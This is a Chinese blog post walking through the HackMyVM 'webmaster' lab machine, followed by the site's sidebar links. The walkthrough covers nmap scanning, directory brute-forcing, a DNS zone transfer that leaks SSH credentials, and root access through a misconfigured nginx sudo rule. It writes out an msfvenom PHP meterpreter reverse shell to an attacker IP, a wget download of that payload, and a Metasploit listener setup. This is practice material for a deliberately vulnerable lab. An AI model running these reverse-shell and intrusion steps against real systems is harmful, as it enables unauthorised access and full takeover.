当前位置:网站首页>HackMyvm靶机系列(1)-webmaster
HackMyvm靶机系列(1)-webmaster
2022-07-06 09:22:00 【月应知我意】
一、信息收集
首先先使用nmap扫描网段,探测存活主机,由于这是校园网主机比较多就不一一找了,使用grep直接找到目标主机。
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
对目标主机进行端口扫描,探测目标开放的服务
nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8
扫描到三个服务,ssh,dns,http
访问一下,发现是一张图片,大致意思就是你把密码保存在哪里?Bitwarden和Keepass百度一下是一种密码管理工具。记住下面那个TXT,是个重要提示。
使用dirsearch扫描一下目录。
dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30
然而并没有发现什么有用信息。
上面图片提示到txt,于是尝试一下使用wfuzz爆破一下txt文件
wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txt
和使用dirsearch一样,一条有用的消息都没有发现
然后查看一下页面源代码,发现一个webmaster.hmv,看上去像是一个域名。于是把它放到host文件中解析,然而并没有什么用。
二、漏洞利用
想到刚才用nmap扫描到有开放dns服务,尝试一下用dig解析一下dns记录
dig axfr @192.168.200.8 webmaster.hmv
#@IP地址 指定DNS服务器
发现这个东西十分可疑,看上去像是一个账号和密码
john:Myhiddenpazzword
尝试登录ssh,登录成功
得到第一个flag
三、权限提升
接下来就是提权操作了
sudo -l
发现nginx可以以任何用户启动,并且不需要输入密码。
通过查看进程,发现nginx是以root权限启动的。
然后查看网页根目录,发现根目录任何人都拥有删除和写入文件的权限,再加上nginx是以root权限启动的,我们可以通过写入shell,再访问这个shell获得权限。
先查看一下主机信息,是86位的
使用msf生成木马
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php
然后目标机上使用wget将木马下载下来
wget http://192.168.200.130:7890/shell.php
赋予执行权限
chmod +x shell.php
在msf上启动监听
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555
kali访问木马文件,由于nginx是root权限运行的,所访问shell.php文件时得到的是root权限
msf收到会话,权限为root
拿到最后一个flag
边栏推荐
猜你喜欢
强化学习系列(一):基本原理和概念
Strengthen basic learning records
Mode 1 two-way serial communication is adopted between machine a and machine B, and the specific requirements are as follows: (1) the K1 key of machine a can control the ledi of machine B to turn on a
【VMware异常问题】问题分析&解决办法
C language Getting Started Guide
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
Nuxtjs快速上手(Nuxt2)
受检异常和非受检异常的区别和理解
Callback function ----------- callback
甲、乙机之间采用方式 1 双向串行通信,具体要求如下: (1)甲机的 k1 按键可通过串行口控制乙机的 LEDI 点亮、LED2 灭,甲机的 k2 按键控制 乙机的 LED1
随机推荐
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
Simply understand the promise of ES6
. How to upload XMIND files to Jinshan document sharing online editing?
受检异常和非受检异常的区别和理解
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
4. Branch statements and loop statements
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
杂谈0516
MySQL锁总结(全面简洁 + 图文详解)
强化学习基础记录
Canvas foundation 2 - arc - draw arc
稻 城 亚 丁
js判断对象是否是数组的几种方式
A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
Relationship between hashcode() and equals()
附加简化版示例数据库到SqlServer数据库实例中
[VMware abnormal problems] problem analysis & Solutions
Miscellaneous talk on May 27
仿牛客技术博客项目常见问题及解答(二)
[the Nine Yang Manual] 2018 Fudan University Applied Statistics real problem + analysis